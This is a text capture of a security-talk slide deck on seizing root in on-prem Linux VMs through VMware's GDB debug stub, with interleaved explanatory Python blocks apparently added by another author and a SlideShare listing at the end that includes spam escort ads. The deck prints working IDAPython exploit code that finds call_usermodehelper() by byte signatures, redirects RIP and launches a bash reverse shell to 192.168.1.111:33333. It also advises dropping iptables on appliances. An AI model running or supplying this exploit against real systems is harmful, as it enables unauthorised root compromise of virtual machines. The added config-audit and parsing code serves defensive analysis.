Breaking into Linux VMs
For Fun and Profit
Russell Sanford
xort @ sploit.online
0x01
• I originally created this technique in 2016 and did a talk called…
Compromising Linux Virtual Machines with Debugging Mechanisms (slideshare.net)
https://www.slideshare.net/xort/compromising-linux-virtual-machines-with-debugging-mechanisms
This technique allows you to seize control of an (on-prem) Linux Virtual
Machine and spawn a connect-back root shell from kernel land.
(Ring0 -> Ring3 -> Us)
Machines relying on LUKS boot-key encryption are not secure, and the code base
of such appliances can be accessed and audited for vulnerabilities.
Breaking Into Linux VMs
for Fun and Profit
0x02
This attack opened the door to finding >30 Remote Root (auth and pre-auth)
vulnerabilities in security vendors’ products
(Citrix, Sophos, Barracuda, Bluecoat, Sonicwall, etc…)
Made me > $20k in bug bounties ( the ‘profit’ :D )
Got me up to #107 among bugcrowd’s ~50k signed-up researchers
0x03
So What Brought this on…
VMware added GDB stubs to their products, allowing OS developers to debug
code running inside their Virtual Machines.
I adapted the methodology used in UNIX ptrace-style attacks to see what fun could be
had…
0x04
Name
call_usermodehelper — prepare and start a usermode application
Synopsis
int call_usermodehelper ( const char * path,
                          char ** argv,
                          char ** envp,
                          int wait);
(FROM KERNEL LAND)
We’re starting off in Kernel Land…
This allows us to go from RING 0 (kernel) to RING 3 (userland),
where we can launch our attack. :D
0x05
Finding Byte Signatures… to find pathways to the API
Locate SIMILAR sections of code from multiple targets using unique
assembly sequences.
Compare the bytes and find sections whose differing bytes (gaps) realign later in
the code, giving more unique samples to match on.
0x06
Configuring IDA PRO
And VMware to have some fun…
0x07
VMWARE GDB STUBS
• VMware Workstation >= 5.0
• VMware Player >= 3.0
• Fusion
• Allow RWX of memory, ability to single-step, etc. @ kernel level
• When attaching to a Linux VM we land in native_safe_halt()
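The GDB stub the deck relies on is not on by default: VMware only binds it when the VM's .vmx file carries debugStub.listen.guest64 (or .guest32) = "TRUE", on localhost unless the matching .remote key is also TRUE, on ports 8864/8832 unless debugStub.port.* overrides them. From the operator's side, the check that matters is therefore whether any production VM config has these keys set. The script below is an added example, not part of the deck or of VMware's tooling; the two .vmx fragments are constructed samples, and the key names are the documented VMware ones.

```python
import re

# Constructed .vmx fragments for the demonstration; neither is a real appliance config.
VMX_PRODUCTION = """\
.encoding = "UTF-8"
config.version = "8"
displayName = "appliance-prod"
"""

VMX_DEBUG = """\
.encoding = "UTF-8"
displayName = "appliance-lab"
debugStub.listen.guest64 = "TRUE"
debugStub.listen.guest64.remote = "TRUE"
debugStub.port.guest64 = "8864"
debugStub.hideBreakpoints = "TRUE"
"""

_KV = re.compile(r'^\s*([A-Za-z0-9_.]+)\s*=\s*"?([^"]*)"?\s*$')
DEFAULT_PORT = {"64": "8864", "32": "8832"}   # VMware's default stub ports per guest width

def parse_vmx(text):
    """Parse key = "value" lines into a dict; keys are lower-cased because VMX keys are
    matched case-insensitively."""
    cfg = {}
    for line in text.splitlines():
        m = _KV.match(line)
        if m:
            cfg[m.group(1).lower()] = m.group(2).strip()
    return cfg

def audit_debug_stub(text):
    """Return findings (strings) describing GDB-stub exposure; an empty list means clean."""
    cfg = parse_vmx(text)
    findings = []
    for bits in ("64", "32"):
        key = f"debugstub.listen.guest{bits}"
        if cfg.get(key, "").upper() == "TRUE":
            port = cfg.get(f"debugstub.port.guest{bits}", DEFAULT_PORT[bits])
            remote = cfg.get(f"{key}.remote", "").upper() == "TRUE"
            where = "accepting REMOTE connections" if remote else "bound to localhost only"
            findings.append(f"GDB stub enabled for the {bits}-bit guest on port {port}, {where}")
    if cfg.get("debugstub.hidebreakpoints", "").upper() == "TRUE":
        findings.append("debugStub.hideBreakpoints is TRUE: debugger breakpoints are hidden from the guest")
    return findings

def harden_vmx(text):
    """Mitigation: return the config with every debugStub.* line removed, so the stub never binds."""
    kept = [ln for ln in text.splitlines() if not ln.lstrip().lower().startswith("debugstub.")]
    return "\n".join(kept) + "\n"

if __name__ == "__main__":
    for name, vmx in (("prod", VMX_PRODUCTION), ("lab", VMX_DEBUG)):
        print(name, audit_debug_stub(vmx) or ["no GDB stub configured"])
```

Run it against every .vmx on a host (or a vCenter export) and treat any finding on a production VM as a misconfiguration; the .remote flag is the one that turns a local debugging aid into a network-reachable ring-0 debugger.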
0x08
Configuring IDA Pro to connect to VMware GDB server
0x09
Configuring IDA Pro to connect to VMware GDB server
0x0A
Configuring IDA Pro to connect to VMware GDB server
0x0B
ORIGINAL ATTACK (2016)
0x0C
ORIGINAL ATTACK (2016)
0x0D
THE REVISED ATTACK (2023)
API Identification…
THE PROBLEM:
The old way was slow and would sometimes fail when debugging over a network…
I needed to come up with a solution to find the call_usermodehelper() API in a quicker and more
elegant way.
THE SOLUTION:
Instead of one large sweep of memory looking for a single byte signature…
I would analyze the kernel and write a routine to find functions that call into functions, that
call into functions, that call into functions (3 layers deep) and end up at an address
CLOSE ( 0xFFFFFFFFF0000 range) to call_usermodehelper().
From here, a final memory-fingerprint byte scan is done to identify call_usermodehelper().
0x0E
THE REVISED ATTACK (2023)
API Pathway Identification Map Routine (Searches 4 Levels Deep in Code XREFs) for an address close
to call_usermodehelper()
0x0F
0x10
• THE REVISED ATTACK (2023)
Shellcode? Who needs Shellcode… :D …..Not Us.
• We change RIP to call_usermodehelper()’s entry point and set the argument registers to point at
ARGV[] data we store further back in the stack
• When it reaches the end of the function – it returns to wherever native_safe_halt() would
have returned, and it’s as if we never made a change
• Return of execution is smoothly given back to the OS – but our shell has been
spawned. :D
0x11
• THE REVISED ATTACK (2023)
We change RIP from native_safe_halt() to call_usermodehelper()
without any patches to the code.
call_usermodehelper() will cleanly exit once our shell is spawned,
by returning to where native_safe_halt() was supposed to return.
0x12
THE REVISED ATTACK (2023)
1) API Identification through:
   A) 1st Round – Memory signature scan to find code XREF’ed to…
   B) Extracting the pointer from the CALL instruction ( and calculating the 2’s complement offset)
   C) 2nd Round – Memory signature scan to find code XREF’ed to…
   D) Extracting the pointer from the CALL instruction ( and calculating the 2’s complement offset)
   E) 3rd Round – Memory scanning for call_usermodehelper()’s API address
2) Backing up Machine State – Register values and the memory area to be used for executing shellcode (current RIP address)
3) Creating ARGV[] data somewhere back in the stack
4) Restoring Machine State – Restoring register values – Setting RIP back – Patching back the memory we overwrote to execute shellcode
0x13
The path to call_usermodehelper() …
0x14
We start in native_safe_halt() …
Scan up in memory for acpi_os_unmap_iomem()
using byte signature pattern: 48 B9 22 01 00 00 00 00 AD DE ...
acpi_os_unmap_iomem_sig = "48 B9 22 01 00 00 00 00 AD DE"
sig_addr = idc.find_binary(addr, SEARCH_UP, acpi_os_unmap_iomem_sig)
0x15
In acpi_os_unmap_iomem() we find a CALL to queue_rcu_work(); we extract the destination API
address from that CALL instruction, whose rel32 operand sits 0x2d bytes from our byte signature.
# "<i" reads the rel32 as a signed 32-bit value; ctypes.c_long is 64 bits on Linux and would not sign-extend
offset_to_queue_rcu_work = unpack("<i", get_bytes(sig_addr + 0x2d, 4, 0))[0]
# rel32 is relative to the instruction after the CALL, i.e. 4 bytes past the operand (not shown on the slide)
queue_rcu_work_address = sig_addr + 0x2d + 4 + offset_to_queue_rcu_work
0x16
queue_rcu_work() resides close to call_usermodehelper() in memory …
call_usermodehelper_sig = "55 83 F9 01 48 89 E5 41 56 41 89 CE 41 55 49 89 FD"
sig_addr = idc.find_binary(queue_rcu_work_address, SEARCH_UP, call_usermodehelper_sig)
We search up for the binary pattern: 55 83 F9 01 48 89 E5 41 56 41 89 CE 41 55 49 89 FD to
find it.
0x17
ARGV in Memory…
• The top area is set aside to hold the QWORD pointers to the strings used in the ARGV array
• It ends with a NULL (QWORD) to signify the end of the array
• The bottom area holds the actual string data
0x18
con_back_ip = "192.168.1.111"
con_back_port = "33333"
command_to_execute = "bash -i >& /dev/tcp/" + con_back_ip + "/" + con_back_port + " 0>&1"  # CMD in memory for ARGV...
cmd_runner_prefix = b"/bin/bash\x00-c\x00"  # payload / command to execute
location = get_reg_value("rsp") - 0x1000   # string area
location2 = get_reg_value("rsp") - 0x1100  # argv[] pointer table
idaapi.dbg_write_memory(location, cmd_runner_prefix + command_to_execute.encode('latin-1') + b"\x00")
set_reg_value(location, "rdi")  # RDI = program to execute
# RSI = construct argv[]
idaapi.dbg_write_memory(location2, pack("<Q", location))        # argv[0] = "/bin/bash" (program name)
idaapi.dbg_write_memory(location2+8, pack("<Q", location+10))   # argv[1] = "-c"
idaapi.dbg_write_memory(location2+16, pack("<Q", location+13))  # argv[2] = command string
idaapi.dbg_write_memory(location2+24, pack("<Q", 0x0))          # end of argv[]
set_reg_value(location2, "rsi")  # RSI = argv[]
set_reg_value(0x0, "rdx")  # RDX = envp[] (null)
set_reg_value(call_usermodehelper, "rip")  # RIP to call_usermodehelper()
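The layout on this slide (a QWORD pointer table ending in a NULL QWORD, with the string bytes behind it) is the ordinary C argv convention, and the offsets +10 and +13 only work because "/bin/bash\0" and "-c\0" are 10 and 3 bytes long. The following is an added example, not the deck's code, written from the memory-forensics side: it builds such a region at a constructed base address so the format is concrete, and then walks a captured region back into its strings while checking that every pointer stays inside the capture. Base address and arguments are constructed.

```python
from struct import pack, unpack_from

def build_argv_region(base, args):
    """Lay out argv as the slide describes: a table of QWORD pointers terminated by a NULL
    QWORD, immediately followed by the NUL-terminated strings the pointers reference.
    `base` is the address at which the returned bytes are assumed to be mapped."""
    table_size = 8 * (len(args) + 1)
    strings = bytearray()
    ptrs = []
    for a in args:
        ptrs.append(base + table_size + len(strings))   # absolute address of this string
        strings += a.encode() + b"\x00"
    table = b"".join(pack("<Q", p) for p in ptrs) + pack("<Q", 0)
    return table + bytes(strings)

def read_argv_region(region, base):
    """Inverse operation for a captured region: walk the pointer table until the NULL QWORD,
    resolve each pointer relative to `base`, and read up to the terminating NUL.
    Raises ValueError if a pointer escapes the capture (wrong base or corrupted table)."""
    args = []
    off = 0
    while True:
        (p,) = unpack_from("<Q", region, off)
        off += 8
        if p == 0:
            return args
        rel = p - base
        if not (0 <= rel < len(region)):
            raise ValueError(f"argv pointer {p:#x} points outside the captured region")
        end = region.index(b"\x00", rel)
        args.append(region[rel:end].decode())

SAMPLE_BASE = 0x7FFF0000            # constructed address, not taken from any real target
SAMPLE_ARGS = ["/bin/echo", "-n", "hello"]

if __name__ == "__main__":
    region = build_argv_region(SAMPLE_BASE, SAMPLE_ARGS)
    print(len(region), "bytes;", read_argv_region(region, SAMPLE_BASE))
```

For the three-argument sample the table is 32 bytes (three pointers plus the NULL), so the first string lands at base+32; reading the same bytes back with the wrong base trips the bounds check instead of silently decoding garbage.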
0x19
Exploit in action…
Root Shell
0x17
The do_coredump() method
Universal unlock method for ALL 5.x and 6.x kernels
( also… much slower :D ! Go grab food and wait! )
0x1A
When we attach to a running Linux kernel using GDB stubs, we land in a call to
native_safe_halt().
This is where our journey begins… :D
0x1B
do_coredump_sig1 = "BA 00 02 00 00 BE C0 0C 00 00 E8 ?? ?? ?? ?? 48 85 C0"
sig_addr = idc.find_binary(addr, SEARCH_UP, do_coredump_sig1)
We search up for the binary pattern: BA 00 02 00 00 BE C0 0C 00 00 E8 ?? ?? ?? ?? 48 85 C0
to land in do_coredump()
0x1C
do_coredump_sig2 = "50 49 8B"
sig_addr = idc.find_binary(sig_addr, SEARCH_UP, do_coredump_sig2)
We search up for the binary pattern: 50 49 8B to land near the call to
call_usermodehelper_setup()…
0x1D
do_coredump_sig3 = "E8 ?? ?? ?? ?? 44 8b"
sig_addr = idc.find_binary(sig_addr, SEARCH_DOWN, do_coredump_sig3)
# sig_addr points at the E8 opcode; its signed rel32 operand follows and is relative to the
# next instruction (sig_addr + 5). "<i" keeps the sign so a backward call resolves correctly.
call_usermodehelper_setup = (sig_addr + 5) + unpack("<i", get_bytes(sig_addr + 0x1, 4, 0))[0]
We search down for the binary pattern: E8 ?? ?? ?? ?? 44 8b to find the actual address reference
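Every round of the API-identification procedure above (steps 1A to 1E on the 0x12 slide, the acpi_os_unmap_iomem() hop, and the three do_coredump() signatures here) rests on two mechanics: a byte-signature search with ?? wildcards, which is what idc.find_binary does with SEARCH_UP / SEARCH_DOWN, and decoding the signed rel32 of an E8 CALL, which is relative to the next instruction (opcode + 5). The block below is an added example, not the deck's code; it reimplements both over a constructed 128-byte image at a made-up load address so the arithmetic can be checked offline, exactly as an analyst resolving call targets in a memory dump would. The sample image, BASE, and the offsets 0x10 / 0x40 are all constructed.

```python
from struct import pack, unpack

BASE = 0xFFFFFFFF81000000  # constructed load address for the sample image (hypothetical)

def parse_signature(sig):
    """Turn a find_binary-style pattern ("E8 ?? ?? ?? ?? 44 8B") into a list of byte values,
    with None standing in for each ?? wildcard."""
    return [None if tok == "??" else int(tok, 16) for tok in sig.split()]

def find_signature(buf, start, sig, direction="down"):
    """Search buf for sig starting at offset start. "down" walks towards higher offsets,
    "up" towards lower ones (the SEARCH_DOWN / SEARCH_UP flags of idc.find_binary).
    Returns the offset of the first match or None."""
    pat = parse_signature(sig)
    last = len(buf) - len(pat)
    if last < 0:
        return None
    if direction == "down":
        candidates = range(max(start, 0), last + 1)
    else:
        candidates = range(min(start, last), -1, -1)
    for off in candidates:
        if all(p is None or buf[off + i] == p for i, p in enumerate(pat)):
            return off
    return None

def rel32_call_target(buf, call_off, base):
    """Resolve an E8 rel32 CALL at buf[call_off] in an image mapped at base. The operand is a
    signed 32-bit displacement measured from the NEXT instruction (call_off + 5), which is why
    "<i" (signed) is used: a backward call carries a negative displacement."""
    if buf[call_off] != 0xE8:
        raise ValueError(f"no E8 CALL at offset {call_off:#x}")
    rel = unpack("<i", buf[call_off + 1:call_off + 5])[0]
    return base + call_off + 5 + rel

def build_sample_image():
    """Constructed sample: a callee at 0x10 and a caller at 0x40 whose CALL is followed by the
    44 8B bytes the signature expects, padded with NOPs."""
    buf = bytearray(b"\x90" * 0x80)
    buf[0x10:0x14] = b"\x55\x48\x89\xE5"          # callee: push rbp; mov rbp, rsp
    buf[0x14] = 0xC3                              # ret
    rel = 0x10 - (0x40 + 5)                       # displacement from the instruction after the CALL
    buf[0x40:0x45] = b"\xE8" + pack("<i", rel)    # call callee (negative rel32)
    buf[0x45:0x48] = b"\x44\x8B\xC0"              # mov r8d, eax
    return bytes(buf)

def resolve_callee(buf, base, scan_from):
    """The two-step walk the slides use: signature-scan up to the CALL, then decode its target.
    Returns (call_offset, target_address)."""
    call_off = find_signature(buf, scan_from, "E8 ?? ?? ?? ?? 44 8B", "up")
    if call_off is None:
        raise LookupError("signature not found")
    return call_off, rel32_call_target(buf, call_off, base)

if __name__ == "__main__":
    img = build_sample_image()
    off, target = resolve_callee(img, BASE, 0x60)
    print(f"CALL at {BASE + off:#x} -> {target:#x}")
    print("callee prologue at", hex(find_signature(img, 0, "55 48 89 E5")))
```

The resolved target lands exactly on the 55 48 89 E5 prologue at BASE + 0x10, which is the cross-check to apply on real dumps too: if the decoded address does not start with a plausible prologue, the signature matched the wrong CALL.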
0x1E
We dereference the address of call_usermodehelper_setup(), knowing call_usermodehelper() is nearby,
just bytes below in a following function definition….
VERY CLOSE NOW! :D
0x1F
call_usermodehelper_sig1 = "81 E6 60 ?? FF FF 48 89 D3 BA ?? 00 00 00 81 C6 C0 0D 00 00"
sig_addr = idc.find_binary(call_usermodehelper_setup, SEARCH_DOWN, call_usermodehelper_sig1)
We search down for the binary pattern: 81 E6 60 ?? FF FF 48 89 D3 BA ?? 00 00 00 81 C6 C0 0D 00
00 to land in call_usermodehelper() …
0x20
call_usermodehelper_sig2 = "E8 ?? ?? ?? ?? 55 83 F9 01"
call_usermodehelper = idc.find_binary(sig_addr, SEARCH_UP, call_usermodehelper_sig2)
Lastly, we search up to find the beginning bytes of the function call_usermodehelper() …
GAME TIME! :D
0x21
The path to call_usermodehelper() using the do_coredump() route/method…
0x22
Root Shell
0x23
Tips for compromising
Network Appliances:
• Prelude payload with call to Drop IPTABLES
• Try adding a serial connection and using a serial connect back 1-liner
0x24
Thanks!
Russell Sanford
xort@sploit.online

More Related Content

Similar to 0x01 - Breaking into Linux VMs for Fun and Profit.pdf

Buffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackTomer Zait
 
Buffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackBuffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackironSource
 
A Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts BytecodeA Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts BytecodeShakacon
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016Mikhail Sosonkin
 
r2con 2017 r2cLEMENCy
r2con 2017 r2cLEMENCyr2con 2017 r2cLEMENCy
r2con 2017 r2cLEMENCyRay Song
 
Semtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege EscalationSemtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege EscalationKernel TLV
 
Compromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsCompromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsRussell Sanford
 
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹GangSeok Lee
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote ShellcodeAj MaChInE
 
D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...
D1 t2   jonathan brossard - breaking virtualization by switching to virtual 8...D1 t2   jonathan brossard - breaking virtualization by switching to virtual 8...
D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...kbour23
 
200 Open Source Projects Later: Source Code Static Analysis Experience
200 Open Source Projects Later: Source Code Static Analysis Experience200 Open Source Projects Later: Source Code Static Analysis Experience
200 Open Source Projects Later: Source Code Static Analysis ExperienceAndrey Karpov
 
Trap Handling in Linux
Trap Handling in LinuxTrap Handling in Linux
Trap Handling in LinuxYongraeJo
 
Track c-High speed transaction-based hw-sw coverification -eve
Track c-High speed transaction-based hw-sw coverification -eveTrack c-High speed transaction-based hw-sw coverification -eve
Track c-High speed transaction-based hw-sw coverification -evechiportal
 
Playing CTFs for Fun & Profit
Playing CTFs for Fun & ProfitPlaying CTFs for Fun & Profit
Playing CTFs for Fun & Profitimpdefined
 
Linux Initialization Process (1)
Linux Initialization Process (1)Linux Initialization Process (1)
Linux Initialization Process (1)shimosawa
 
Attack your Trusted Core
Attack your Trusted CoreAttack your Trusted Core
Attack your Trusted CoreDi Shen
 
BKK16-211 Internet of Tiny Linux (io tl)- Status and Progress
BKK16-211 Internet of Tiny Linux (io tl)- Status and ProgressBKK16-211 Internet of Tiny Linux (io tl)- Status and Progress
BKK16-211 Internet of Tiny Linux (io tl)- Status and ProgressLinaro
 
C Programming Training in Ambala ! Batra Computer Centre
C Programming Training in Ambala ! Batra Computer CentreC Programming Training in Ambala ! Batra Computer Centre
C Programming Training in Ambala ! Batra Computer Centrejatin batra
 
Hot Code is Faster Code - Addressing JVM Warm-up
Hot Code is Faster Code - Addressing JVM Warm-upHot Code is Faster Code - Addressing JVM Warm-up
Hot Code is Faster Code - Addressing JVM Warm-upMark Price
 

Similar to 0x01 - Breaking into Linux VMs for Fun and Profit.pdf (20)

Buffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The Stack
 
Buffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackBuffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the Stack
 
A Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts BytecodeA Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts Bytecode
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016
 
r2con 2017 r2cLEMENCy
r2con 2017 r2cLEMENCyr2con 2017 r2cLEMENCy
r2con 2017 r2cLEMENCy
 
Semtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege EscalationSemtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege Escalation
 
Compromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsCompromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging Mechanisms
 
Ansible101
Ansible101Ansible101
Ansible101
 
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
 
D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...
D1 t2   jonathan brossard - breaking virtualization by switching to virtual 8...D1 t2   jonathan brossard - breaking virtualization by switching to virtual 8...
D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...
 
200 Open Source Projects Later: Source Code Static Analysis Experience
200 Open Source Projects Later: Source Code Static Analysis Experience200 Open Source Projects Later: Source Code Static Analysis Experience
200 Open Source Projects Later: Source Code Static Analysis Experience
 
Trap Handling in Linux
Trap Handling in LinuxTrap Handling in Linux
Trap Handling in Linux
 
Track c-High speed transaction-based hw-sw coverification -eve
Track c-High speed transaction-based hw-sw coverification -eveTrack c-High speed transaction-based hw-sw coverification -eve
Track c-High speed transaction-based hw-sw coverification -eve
 
Playing CTFs for Fun & Profit
Playing CTFs for Fun & ProfitPlaying CTFs for Fun & Profit
Playing CTFs for Fun & Profit
 
Linux Initialization Process (1)
Linux Initialization Process (1)Linux Initialization Process (1)
Linux Initialization Process (1)
 
Attack your Trusted Core
Attack your Trusted CoreAttack your Trusted Core
Attack your Trusted Core
 
BKK16-211 Internet of Tiny Linux (io tl)- Status and Progress
BKK16-211 Internet of Tiny Linux (io tl)- Status and ProgressBKK16-211 Internet of Tiny Linux (io tl)- Status and Progress
BKK16-211 Internet of Tiny Linux (io tl)- Status and Progress
 
C Programming Training in Ambala ! Batra Computer Centre
C Programming Training in Ambala ! Batra Computer CentreC Programming Training in Ambala ! Batra Computer Centre
C Programming Training in Ambala ! Batra Computer Centre
 
Hot Code is Faster Code - Addressing JVM Warm-up
Hot Code is Faster Code - Addressing JVM Warm-upHot Code is Faster Code - Addressing JVM Warm-up
Hot Code is Faster Code - Addressing JVM Warm-up
 

Recently uploaded

Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...soniya singh
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptkotipi9215
 
What are the features of Vehicle Tracking System?
What are the features of Vehicle Tracking System?What are the features of Vehicle Tracking System?
What are the features of Vehicle Tracking System?Watsoo Telematics
 
why an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfwhy an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfjoe51371421
 
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio, Inc.
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureDinusha Kumarasiri
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityNeo4j
 
Engage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyEngage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyFrank van der Linden
 
Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...aditisharan08
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideChristina Lin
 
buds n tech IT solutions
buds n  tech IT                solutionsbuds n  tech IT                solutions
buds n tech IT solutionsmonugehlot87
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWave PLM
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEOrtus Solutions, Corp
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfkalichargn70th171
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)OPEN KNOWLEDGE GmbH
 
cybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningcybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningVitsRangannavar
 

Recently uploaded (20)

Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.ppt
 
What are the features of Vehicle Tracking System?
What are the features of Vehicle Tracking System?What are the features of Vehicle Tracking System?
What are the features of Vehicle Tracking System?
 
why an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfwhy an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdf
 
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
